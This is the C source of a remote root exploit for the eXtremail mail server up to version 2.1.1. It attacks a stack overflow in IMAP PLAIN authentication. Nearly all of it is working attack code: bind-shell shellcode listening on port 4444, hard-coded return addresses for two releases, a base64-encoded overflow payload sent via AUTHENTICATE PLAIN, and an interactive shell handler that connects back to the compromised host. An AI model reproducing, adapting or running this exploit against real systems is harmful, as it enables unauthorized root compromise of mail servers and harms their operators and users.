eXtremail <= 2.1.1 PLAIN authentication Remote Stack Overflo

1. /* extremail-v6.c
2. *
3. * Copyright (c) 2006 by <mu-b@digit-labs.org>
4. *
5. * eXtremail <=2.1.1 remote root exploit (x86-lnx)
6. * by mu-b - Wed Oct 18 2006
7. *
8. * - Tested on: eXtremail 2.1.1 (lnx)
9. * eXtremail 2.1.0 (lnx)
10. *
11. * Stack overflow in ifParseAuthPlain
12. *
13. * - Private Source Code -DO NOT DISTRIBUTE -
14. * http://www.digit-labs.org/ -- Digit-Labs 2006!@$!
15. */
16.  
17. #include <stdio.h>
18. #include <stdlib.h>
19.  
20. #include <string.h>
21. #include <unistd.h>
22. #include <netinet/in.h>
23. #include <netdb.h>
24.  
25. #define BUF_SIZE 2048
26. #define BBUF_SIZE BUF_SIZE/3*4+1
27.  
28. #define NOP 0x41
29.  
30. #define AUTH_CMD "1 AUTHENTICATE PLAIN\n"
31.  
32. #define DEF_PORT 143
33. #define PORT_IMAPD DEF_PORT
34. #define PORT_SHELL 4444
35.  
36. static const char movshell_lnx[] =
37. "\x8b\x44\x24\x08" /* mov 0x08(%esp),%eax */
38. "\x40" /* inc %eax */
39. "\xff\xe0"; /* jmp *%eax */
40.  
41. static const char bndshell_lnx[] =
42. "\x31\xdb\x53\x43\x53\x6a\x02\x6a\x66\x58\x99\x89\xe1\xcd\x80\x96"
43. "\x43\x52\x66\x68\x11\x5c\x66\x53\x89\xe1\x6a\x66\x58\x50\x51\x56"
44. "\x89\xe1\xcd\x80\xb0\x66\xd1\xe3\xcd\x80\x52\x52\x56\x43\x89\xe1"
45. "\xb0\x66\xcd\x80\x93\x6a\x02\x59\xb0\x3f\xcd\x80\x49\x79\xf9\xb0"
46. "\x0b\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53"
47. "\x89\xe1\xcd\x80";
48.  
49. #define NUM_TARGETS 2
50.  
51. struct target_t
52. {
53. const char *name;
54. const int len;
55. const int zshell_pos;
56. const char *zshell;
57. const int fp_pos;
58. const unsigned long fp;
59. };
60.  
61. /* fp = objdump -D smtpd | grep "ff e0" */
62. struct target_t targets[] = {
63. {"Linux eXtremail 2.1.1 (tar.gz)",
64. 256, 1, bndshell_lnx, 140, 0x08216357}
65. ,
66. {"Linux eXtremail 2.1.0 (tar.gz)",
67. 256, 1, bndshell_lnx, 140, 0x08216377}
68. ,
69. {0}
70. };
71.  
72. static const char base64tab[] =
73. "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";
74.  
75. static int base64 (const char *ibuf, char *obuf, size_t n);
76. static int sock_send (int sock, char *src, int len);
77. static int sock_recv (int sock, char *dst, int len);
78. static int sockami (char *host, int port);
79. static void shellami (int sock);
80. static void zbuffami (char *zbuf, struct target_t *trgt);
81.  
82. static int
83. base64 (const char *ibuf, char *obuf, size_t n)
84. {
85. int a, b, c;
86. int i, j;
87. int d, e, f, g;
88.  
89. a = b = c = 0;
90. for (j = i = 0; i < n; i += 3)
91. {
92. a = (unsigned char) ibuf[i];
93. b = i + 1 < n ? (unsigned char) ibuf[i + 1] : 0;
94. c = i + 2 < n ? (unsigned char) ibuf[i + 2] : 0;
95.  
96. d = base64tab[a >> 2];
97. e = base64tab[((a & 3) << 4) | (b >> 4)];
98. f = base64tab[((b & 15) << 2) | (c >> 6)];
99. g = base64tab[c & 63];
100.  
101. if (i + 1 >= n)
102. f = '=';
103. if (i + 2 >= n)
104. g = '=';
105.  
106. obuf[j++] = d, obuf[j++] = e;
107. obuf[j++] = f, obuf[j++] = g;
108. }
109.  
110. obuf[j++] = '\n';
111. obuf[j++] = '\0';
112.  
113. return strlen (obuf);
114. }
115.  
116. static int
117. sock_send (int sock, char *src, int len)
118. {
119. int sbytes;
120.  
121. sbytes = send (sock, src, len, 0);
122.  
123. return (sbytes);
124. }
125.  
126. static int
127. sock_recv (int sock, char *dst, int len)
128. {
129. int rbytes;
130.  
131. rbytes = recv (sock, dst, len, 0);
132. if (rbytes >= 0)
133. dst[rbytes] = '\0';
134.  
135. return (rbytes);
136. }
137.  
138. static int
139. sockami (char *host, int port)
140. {
141. struct sockaddr_in address;
142. struct hostent *hp;
143. int sock;
144.  
145. fflush (stdout);
146. if ((sock = socket (AF_INET, SOCK_STREAM, 0)) == -1)
147. {
148. perror ("socket()");
149. exit (-1);
150. }
151.  
152. if ((hp = gethostbyname (host)) == NULL)
153. {
154. perror ("gethostbyname()");
155. exit (-1);
156. }
157.  
158. memset (&address, 0, sizeof (address));
159. memcpy ((char *) &address.sin_addr, hp->h_addr, hp->h_length);
160. address.sin_family = AF_INET;
161. address.sin_port = htons (port);
162.  
163. if (connect (sock, (struct sockaddr *) &address, sizeof (address)) == -1)
164. {
165. perror ("connect()");
166. exit (EXIT_FAILURE);
167. }
168.  
169. return (sock);
170. }
171.  
172. static void
173. shellami (int sock)
174. {
175. int n;
176. fd_set rset;
177. char recvbuf[1024], *cmd = "id; uname -a; uptime\n";
178.  
179. sock_send (sock, cmd, strlen (cmd));
180.  
181. while (1)
182. {
183. FD_ZERO (&rset);
184. FD_SET (sock, &rset);
185. FD_SET (STDIN_FILENO, &rset);
186. select (sock + 1, &rset, NULL, NULL, NULL);
187. if (FD_ISSET (sock, &rset))
188. {
189. if ((n = sock_recv (sock, recvbuf, sizeof (recvbuf) - 1)) <= 0)
190. {
191. fprintf (stderr, "Connection closed by foreign host.\n");
192. exit (EXIT_SUCCESS);
193. }
194. printf ("%s", recvbuf);
195. }
196. if (FD_ISSET (STDIN_FILENO, &rset))
197. {
198. if ((n = read (STDIN_FILENO, recvbuf, sizeof (recvbuf) - 1)) > 0)
199. {
200. recvbuf[n] = '\0';
201. sock_send (sock, recvbuf, n);
202. }
203. }
204. }
205. }
206.  
207. static void
208. zbuffami (char *zbuf, struct target_t *trgt)
209. {
210. int i;
211. char *fill = "digitlabs";
212.  
213. memset (zbuf, NOP, trgt->len);
214. memcpy (zbuf + trgt->zshell_pos, trgt->zshell, strlen (trgt->zshell));
215.  
216. zbuf[trgt->fp_pos + 1] = (u_char) (trgt->fp & 0x000000ff);
217. zbuf[trgt->fp_pos + 1 + 1] = (u_char) ((trgt->fp & 0x0000ff00) >> 8);
218. zbuf[trgt->fp_pos + 1 + 2] = (u_char) ((trgt->fp & 0x00ff0000) >> 16);
219. zbuf[trgt->fp_pos + 1 + 3] = (u_char) ((trgt->fp & 0xff000000) >> 24);
220.  
221. memcpy (zbuf + trgt->fp_pos + 1 + sizeof (u_long), movshell_lnx,
222. strlen (movshell_lnx));
223.  
224. /* rfc #2595 states "\x00<username>\x00<password>" */
225. zbuf[0] = '\0';
226. zbuf[trgt->fp_pos + 1 + sizeof (u_long) + strlen (movshell_lnx)] = '\0';
227.  
228. for (i = trgt->fp_pos + 1 + sizeof (u_long) + strlen (movshell_lnx) + 1;
229. i < trgt->len; i++)
230. zbuf[i] = fill[i % strlen (fill)];
231. }
232.  
233. int
234. main (int argc, char **argv)
235. {
236. int sock, rbytes;
237. char zbuf[BUF_SIZE], sbuf[BBUF_SIZE];
238. struct target_t *trgt;
239.  
240. printf ("eXtremail <=2.1.1 remote root exploit\n"
241. "by: <mu-b@digit-labs.org>\n"
242. "http://www.digit-labs.org/ -- Digit-Labs 2007!@$!\n\n");
243.  
244. if (argc <= 2)
245. {
246. fprintf (stderr, "Usage: %s <host> <target>\n", argv[0]);
247. exit (EXIT_SUCCESS);
248. }
249.  
250. if (atoi (argv[2]) >= NUM_TARGETS)
251. {
252. fprintf (stderr, "Only %d targets known!!\n", NUM_TARGETS);
253. exit (EXIT_SUCCESS);
254. }
255.  
256. trgt = &targets[atoi (argv[2])];
257. printf ("+Connecting to %s...", argv[1]);
258. sock = sockami (argv[1], PORT_IMAPD);
259. rbytes = sock_recv (sock, zbuf, sizeof (zbuf) - 1);
260. if (rbytes < 0)
261. exit (EXIT_SUCCESS);
262. printf (" connected\n");
263.  
264. printf ("fp: 0x%x\n", (int) trgt->fp);
265. printf ("buf len: %d\n", trgt->len);
266.  
267. printf ("+Building buffer with shellcode...");
268. memset (zbuf, 0x00, sizeof (zbuf));
269. zbuffami (zbuf, trgt);
270. printf (" done\n");
271.  
272. printf ("+Building base64 encoded buffer...");
273. base64 (zbuf, sbuf, trgt->len);
274. printf (" done\n");
275.  
276. #ifdef DEBUG
277. sleep (15);
278. #endif
279.  
280. printf ("+Making request...");
281. sock_send (sock, AUTH_CMD, strlen (AUTH_CMD));
282. rbytes = sock_recv (sock, zbuf, sizeof (zbuf) - 1);
283. if (rbytes < 0)
284. exit (EXIT_SUCCESS);
285.  
286. sock_send (sock, sbuf, strlen (sbuf));
287. printf (" done\n");
288.  
289. printf ("+Waiting for the shellcode to be executed...\n");
290. sleep (1);
291. sock = sockami (argv[1], PORT_SHELL);
292. printf ("+Wh00t!\n\n");
293. shellami (sock);
294.  
295. return (EXIT_SUCCESS);
296. }